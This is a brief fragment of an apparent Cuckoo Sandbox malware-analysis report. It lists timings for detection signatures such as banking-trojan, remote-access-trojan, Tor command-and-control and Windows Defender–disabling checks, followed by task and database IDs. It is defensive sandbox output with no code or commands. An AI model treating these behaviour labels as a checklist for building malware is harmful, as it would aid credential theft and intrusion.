  • 0.001 banker_cridex
  • 0.001 banker_zeus_mutex
  • 0.001 bot_drive
  • 0.001 bot_drive2
  • 0.001 browser_addon
  • 0.001 disables_system_restore
  • 0.001 disables_windows_defender
  • 0.001 downloader_cabby
  • 0.001 network_cnc_http
  • 0.001 network_tor_service
  • 0.001 packer_armadillo_regkey
  • 0.001 rat_spynet
  • 0.001 recon_programs
  • 0.001 stealth_modify_uac_prompt

Reporting ( 0.496 seconds )

  • 0.496 Malheur
Task ID 215070
Mongo ID 5bf28e672e06334ad86c89b2
Cuckoo release 1.4-Maldun